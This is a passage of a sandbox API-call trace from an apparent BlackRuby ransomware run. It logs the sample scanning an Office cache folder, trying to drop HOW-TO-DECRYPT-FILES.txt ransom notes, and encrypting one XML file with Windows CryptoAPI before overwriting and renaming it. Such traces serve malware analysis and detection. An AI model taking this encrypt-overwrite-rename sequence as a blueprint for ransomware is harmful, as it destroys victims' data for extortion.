lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\osetup.dll"), fInfoLevelId=0x0, lpFileInformation=0x1bbd054 | out: lpFileInformation=0x1bbd054*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafd502d0, ftCreationTime.dwHighDateTime=0x1cbe243, ftLastAccessTime.dwLowDateTime=0xafd502d0, ftLastAccessTime.dwHighDateTime=0x1cbe243, ftLastWriteTime.dwLowDateTime=0x90663e80, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x585768)) returned 1 [0047.625] GetLastError () returned 0x5 [0047.625] SetErrorMode (uMode=0x0) returned 0x1 [0047.626] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.626] GetLastError () returned 0x5 [0047.626] SetErrorMode (uMode=0x1) returned 0x0 [0047.626] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.626] GetLastError () returned 0x5 [0047.628] SetErrorMode (uMode=0x0) returned 0x1 [0047.628] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\OWOW64WW.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\OWOW64WW.cab", lpFilePart=0x0) returned 0x4b [0047.628] GetLastError () returned 0x5 [0047.628] SetErrorMode (uMode=0x1) returned 0x0 [0047.628] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\OWOW64WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\owow64ww.cab"), fInfoLevelId=0x0, lpFileInformation=0x1bdb02c | out: lpFileInformation=0x1bdb02c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82f9c440, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x82f9c440, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0x8a4ca8e0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x16c2838)) returned 1 [0047.629] GetLastError () returned 0x5 [0047.629] SetErrorMode (uMode=0x0) returned 0x1 [0047.630] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.630] GetLastError () returned 0x5 [0047.630] SetErrorMode (uMode=0x1) returned 0x0 [0047.630] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.630] GetLastError () returned 0x5 [0047.632] SetErrorMode (uMode=0x0) returned 0x1 [0047.632] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PidGenX.dll", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PidGenX.dll", lpFilePart=0x0) returned 0x4a [0047.632] GetLastError () returned 0x5 [0047.632] SetErrorMode (uMode=0x1) returned 0x0 [0047.632] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\pidgenx.dll"), fInfoLevelId=0x0, lpFileInformation=0x1bf9010 | out: lpFileInformation=0x1bf9010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f6516e0, ftCreationTime.dwHighDateTime=0x1cafc38, ftLastAccessTime.dwLowDateTime=0x7f6516e0, ftLastAccessTime.dwHighDateTime=0x1cafc38, ftLastWriteTime.dwLowDateTime=0x9105b2d0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x130b10)) returned 1 [0047.632] GetLastError () returned 0x5 [0047.632] SetErrorMode (uMode=0x0) returned 0x1 [0047.633] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.633] GetLastError () returned 0x5 [0047.633] SetErrorMode (uMode=0x1) returned 0x0 [0047.633] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.634] GetLastError () returned 0x5 [0047.635] SetErrorMode (uMode=0x0) returned 0x1 [0047.636] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpFilePart=0x0) returned 0x57 [0047.636] GetLastError () returned 0x5 [0047.636] SetErrorMode (uMode=0x1) returned 0x0 [0047.636] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), fInfoLevelId=0x0, lpFileInformation=0x1c16eec | out: lpFileInformation=0x1c16eec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0x9105b2d0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a)) returned 1 [0047.636] GetLastError () returned 0x5 [0047.636] SetErrorMode (uMode=0x0) returned 0x1 [0047.637] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.637] GetLastError () returned 0x5 [0047.637] SetErrorMode (uMode=0x1) returned 0x0 [0047.637] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.637] GetLastError () returned 0x5 [0047.638] SetErrorMode (uMode=0x0) returned 0x1 [0047.638] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.msi", lpFilePart=0x0) returned 0x4c [0047.638] GetLastError () returned 0x5 [0047.639] SetErrorMode (uMode=0x1) returned 0x0 [0047.639] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\prjprorww.msi"), fInfoLevelId=0x0, lpFileInformation=0x1c34e20 | out: lpFileInformation=0x1c34e20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c589c30, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c589c30, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0x8d310420, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x812a00)) returned 1 [0047.639] GetLastError () returned 0x5 [0047.639] SetErrorMode (uMode=0x0) returned 0x1 [0047.639] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.639] GetLastError () returned 0x5 [0047.639] SetErrorMode (uMode=0x1) returned 0x0 [0047.640] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.640] GetLastError () returned 0x5 [0047.641] SetErrorMode (uMode=0x0) returned 0x1 [0047.641] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0047.641] GetLastError () returned 0x5 [0047.641] SetErrorMode (uMode=0x1) returned 0x0 [0047.641] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\prjprorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c52d08 | out: lpFileInformation=0x1c52d08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca73160, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca73160, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0x8d2e9320, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x19da)) returned 1 [0047.641] GetLastError () returned 0x5 [0047.641] SetErrorMode (uMode=0x0) returned 0x1 [0047.642] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0047.642] GetLastError () returned 0x5 [0047.642] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0047.642] GetLastError () returned 0x5 [0047.642] SetErrorMode (uMode=0x1) returned 0x0 [0047.642] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.642] GetLastError () returned 0x0 [0047.642] GetFileType (hFile=0x184) returned 0x1 [0047.642] SetErrorMode (uMode=0x0) returned 0x1 [0047.642] GetFileType (hFile=0x184) returned 0x1 [0047.642] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x19da [0047.642] GetLastError () returned 0x0 [0047.642] ReadFile (in: hFile=0x184, lpBuffer=0x1c54cc0, nNumberOfBytesToRead=0x19da, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c54cc0*, lpNumberOfBytesRead=0x18ed84*=0x19da, lpOverlapped=0x0) returned 1 [0047.652] GetLastError () returned 0x0 [0047.652] CloseHandle (hObject=0x184) returned 1 [0047.652] GetLastError () returned 0x0 [0047.652] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0047.652] GetLastError () returned 0x0 [0047.652] SetErrorMode (uMode=0x1) returned 0x0 [0047.652] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\prjprorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca73160, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca73160, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0x8d2e9320, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x19da)) returned 1 [0047.652] GetLastError () returned 0x0 [0047.652] SetErrorMode (uMode=0x0) returned 0x1 [0047.652] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0047.653] GetLastError () returned 0x0 [0047.685] CryptImportKey (in: hProv=0x37c708, pbData=0x1cb2464, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360a20) returned 1 [0047.685] GetLastError () returned 0x0 [0047.685] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.685] GetLastError () returned 0x0 [0047.690] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.690] GetLastError () returned 0x0 [0047.690] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ee0) returned 1 [0047.690] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.690] GetLastError () returned 0x0 [0047.690] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1cdf4b0*=0x1, dwFlags=0x0) returned 1 [0047.690] GetLastError () returned 0x0 [0047.690] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1cdf47c, dwFlags=0x0) returned 1 [0047.690] GetLastError () returned 0x0 [0047.690] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cdf4f8*, pdwDataLen=0x18ed74*=0x1ad0, dwBufLen=0x1ad0 | out: pbData=0x1cdf4f8*, pdwDataLen=0x18ed74*=0x1ad0) returned 1 [0047.690] GetLastError () returned 0x0 [0047.690] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce2ac4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1ce2ac4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.690] GetLastError () returned 0x0 [0047.690] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ce2af4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1ce2af4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.690] GetLastError () returned 0x0 [0047.690] CryptDestroyKey (hKey=0x360a20) returned 1 [0047.690] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.690] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.690] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0047.690] GetLastError () returned 0x0 [0047.690] SetErrorMode (uMode=0x1) returned 0x0 [0047.690] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.691] GetLastError () returned 0xb7 [0047.691] GetFileType (hFile=0x184) returned 0x1 [0047.691] SetErrorMode (uMode=0x0) returned 0x1 [0047.691] GetFileType (hFile=0x184) returned 0x1 [0047.697] CloseHandle (hObject=0x184) returned 1 [0047.697] GetLastError () returned 0xb7 [0047.697] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0047.697] GetLastError () returned 0xb7 [0047.697] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Encrypted_Mm9YvHHgLRuLq0eMXl5pbNpvidDdpAi0E4C8kjPms6.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Encrypted_Mm9YvHHgLRuLq0eMXl5pbNpvidDdpAi0E4C8kjPms6.BlackRuby", lpFilePart=0x0) returned 0x7d [0047.697] GetLastError () returned 0xb7 [0047.697] SetErrorMode (uMode=0x1) returned 0x0 [0047.697] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\prjprorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca73160, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca73160, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0x24a25e20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1ae0)) returned 1 [0047.697] GetLastError () returned 0xb7 [0047.697] SetErrorMode (uMode=0x0) returned 0x1 [0047.697] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Encrypted_Mm9YvHHgLRuLq0eMXl5pbNpvidDdpAi0E4C8kjPms6.BlackRuby" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\encrypted_mm9yvhhglrulq0emxl5pbnpvidddpai0e4c8kjpms6.blackruby")) returned 1 [0047.698] GetLastError () returned 0xb7 [0047.698] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.698] GetLastError () returned 0xb7 [0047.698] SetErrorMode (uMode=0x1) returned 0x0 [0047.698] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.698] GetLastError () returned 0x5 [0047.699] SetErrorMode (uMode=0x0) returned 0x1 [0047.699] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjPrrWW.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjPrrWW.cab", lpFilePart=0x0) returned 0x4b [0047.699] GetLastError () returned 0x5 [0047.699] SetErrorMode (uMode=0x1) returned 0x0 [0047.699] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\prjprrww.cab"), fInfoLevelId=0x0, lpFileInformation=0x1d050ac | out: lpFileInformation=0x1d050ac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74e39540, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x74e39540, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0x8dd9ee50, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x8480576)) returned 1 [0047.699] GetLastError () returned 0x5 [0047.699] SetErrorMode (uMode=0x0) returned 0x1 [0047.700] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.700] GetLastError () returned 0x5 [0047.700] SetErrorMode (uMode=0x1) returned 0x0 [0047.700] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.700] GetLastError () returned 0x5 [0047.701] SetErrorMode (uMode=0x0) returned 0x1 [0047.701] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\setup.exe", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\setup.exe", lpFilePart=0x0) returned 0x48 [0047.701] GetLastError () returned 0x5 [0047.701] SetErrorMode (uMode=0x1) returned 0x0 [0047.701] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\setup.exe"), fInfoLevelId=0x0, lpFileInformation=0x1d22f10 | out: lpFileInformation=0x1d22f10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb03b65c0, ftCreationTime.dwHighDateTime=0x1cbe243, ftLastAccessTime.dwLowDateTime=0xb03b65c0, ftLastAccessTime.dwHighDateTime=0x1cbe243, ftLastWriteTime.dwLowDateTime=0x90663e80, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x10cb78)) returned 1 [0047.701] GetLastError () returned 0x5 [0047.701] SetErrorMode (uMode=0x0) returned 0x1 [0047.704] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.704] GetLastError () returned 0x5 [0047.704] SetErrorMode (uMode=0x1) returned 0x0 [0047.704] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.704] GetLastError () returned 0x5 [0047.704] SetErrorMode (uMode=0x0) returned 0x1 [0047.705] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.705] GetLastError () returned 0x5 [0047.705] SetErrorMode (uMode=0x1) returned 0x0 [0047.705] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: 